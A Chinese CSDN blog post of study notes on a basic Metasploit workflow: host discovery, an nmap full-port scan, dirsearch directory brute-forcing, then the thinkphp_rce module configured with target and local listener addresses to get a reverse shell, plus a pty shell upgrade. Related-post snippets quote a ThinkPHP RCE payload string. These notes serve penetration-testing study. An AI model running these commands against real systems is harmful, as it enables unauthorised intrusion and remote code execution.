msf基础渗透流程

最新推荐文章于 2024-05-10 17:50:51 发布
最新推荐文章于 2024-05-10 17:50:51 发布
阅读量690 收藏 3
点赞数
分类专栏: 笔记 文章标签: 安全
coolwhisper
本文链接:https://blog.csdn.net/weixin_44947444/article/details/115802334
版权

1.使用nmap收集信息

netdiscover     //发现存活主机

nmap 收集信息

nmap -sT -T4 -p- 192.168.23.128      //sT:TCP三次握手  
                    //T4:扫描耗时级别,数值越大速度越快,可靠性相应降低。 
                    //-p:指定端口 && -p-:全部端口

web目录爆破(下载dirsearch工具)

cd dirsearch/                        
python3 dirsearch.py -u 192.168.23.128 -e*    //*全部语言,可以用php,jsp,asp具体替换。

2.使用search命令查找相关模块

msfconsole
search thinkphp    //查找thinkphp漏洞利用模块

3.使用use调用模块(攻击代码exploit,利用漏洞进入目标系统代码)

use exploit/unix/webapp/thinkphp_rce  //使用该模块

4.使用info查看模块信息
5.选择攻击payload(有效载荷payload,在成功进入目标系统后执行的代码)
6.设置攻击参数

show options      //查看必要配置
set rhosts 10.10.10.3   //设置目标ip
set rport 80   //设置目标开放端口,默认为4444
set targeturi /public   //设置目标目录的URI

set lhost 192.168.23.129   //设置本地监听主机的ip地址
set lport 8080  //设置本地监听的端口
exploit  //启动模块

python -c "import pty;pty.spawn('/bin/bash')"     //目标shell显示提示命令

background   //不断开连接目标shell,退回msf命令中

7.渗透攻击

吃饺子不蘸酱油
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSF(1)——一次完整的渗透流程
realmels的博客
09-04 3971
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell Vulnhub靶机渗透之Me and My Girlfriend XSS漏洞 文件上传漏洞 文件.
MSF渗透攻击
weixin_43749601的博客
03-06 1709
进程迁移 刚获得shell时,该shell是极其脆弱和容易受到攻击的。所以第一步就是要移动这个shell,把它和目标机的一个稳定的进程绑定在一块。 1.ps命令获取目标机正在运行的进程。 2.getpid获得shell的进程号(PID) 3.通过进程号得知该shell的进程名。 4.输入migrate + 被绑定进程的PID 5.再次输出getpid,发现进程号已经变成需要迁移的进程号,进程迁移成功 系统命令 shell连接稳定之后,开始收集系统信息 1.sysinfo命令查看目标机的系统信息 2.rou
CFS内网穿刺渗透
最新发布
weixin_65575962的博客
05-10 1014
这是完整,流畅的cfs渗透过程
生成msf常用payload
hl1293348082的专栏
04-07 2585
msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成的payload列表: msfvenom -l 正在上传…重新上传取消 生成二进制文件 关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。 Windows ms
thinkphp漏洞复现
zzf011900的博客
04-02 1291
thinkphp 远程命令执行漏洞php的一个开发框架,5.0.23及以前的版本,获取method的方法没有正确处理方法名,导致攻击者可以调用request类任意方法,构造payload,导致远程命令执行。浏览器访问:http://192.168.59.10:8080/index.php?Rce 恶意构迷的语句在服务器(系统)上执行,从而达到黑客控制服务器的目的。浏览器访问:http://192.168.59.10:8080/函数:一串按照顺序和一定逻辑执行的代码。MSF实现直接获取权限原理。
Metasploit渗透框架超详细
HAKUNAMATATATTA的博客
12-26 1999
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。模块是通过Metasploit框架装载集成对外提供的最核心的渗透测试功能实现代码。MSF所有的漏洞测试都是基于模块。
浅谈MSF渗透测试
02-24
渗透过程MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
kali 渗透msf
11-14
kali渗透测试利器
msf内网渗透
10-29
msf内网渗透
MSF框架流程.pptx
09-24
MSF 框架流程 MSF(Microsoft Solution Framework)是一种项目管理框架,旨在帮助项目团队和产品组更好地管理项目,从而提高项目的成功率。MSF 框架流程主要包括五个阶段:构思阶段、计划阶段、开发阶段、稳定阶段...
ThinkPHP 多语言模块RCE漏洞复现
0xSec
12-25 3587
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。
msf基础使用
longwanlian的博客
12-12 432
终端输入msfconsole。
kali渗透测试与教学笔记7:
lm19770429的专栏
04-23 332
windows服务渗透攻击实战——MS08-067安全漏洞
攻防世界web进阶区php_rce--Thinkphp5.x命令执行漏洞
hxhxhxhxx的博客
07-15 511
攻防世界web进阶区php_rce--Thinkphp5.x命令执行漏洞题目解法 题目 首先我们是命令执行rce,那么我们一般优先访问index.php 然后进行代码审计(这里为了方便,搬运简书大佬的复现和审计) 简书大佬的复现 解法 因为要将我们输入的东西实例化(thinkphp他是这么叫的) ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find
msf使用
温和的跳跃
01-17 273
这个还是要学学,我感觉还可以。工具学学bp sqlmap namp msf应该差不多可以了。这个比其他的几个复杂一些。这篇文章马上安排上
msf学习之旅
12306小哥
11-11 919
从八月份到十一月份,从Antiy到新单位,现在算是正式落下脚。开始研究一些新的东西。上周正好有点时间,就在本地复现了三个msf系列的漏洞。做了相关记录,分享出来,网上也有相关文章,可以学习参考。 Microsoft Windows Server服务远程缓冲区溢出漏洞(MS06-040) #msfconsole msf > search ms06-040 msf > use ...
线下靶机测试:hacknox-1
weixin_57567689的博客
08-30 610
对线下靶机进行测试
Thinkphp 缓存RCE
weixin_30635053的博客
06-16 586
5.0.0<=ThinkPHP5<=5.0.10。 漏洞利用条件: 1.基于tp5开发的代码使用了Cache::set 进行缓存 2.在利用版本范围内 3.runtime目录可以访问 扩展: 1.不可访问,可以考虑包含。前提要找到包含处。//Tp有一个Cache一个包含 2.利用缓存,做一个长期的shell动态生成。 ...
msf渗透linux
09-07
MSF (Metasploit Framework) 是一个开源的渗透测试工具,用于评估和保护计算机系统的安全性。它提供了一系列的模块和工具,可以用于漏洞扫描、漏洞利用、远程控制和后渗透等活动。 在使用 MSF 进行 Linux 渗透测试...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值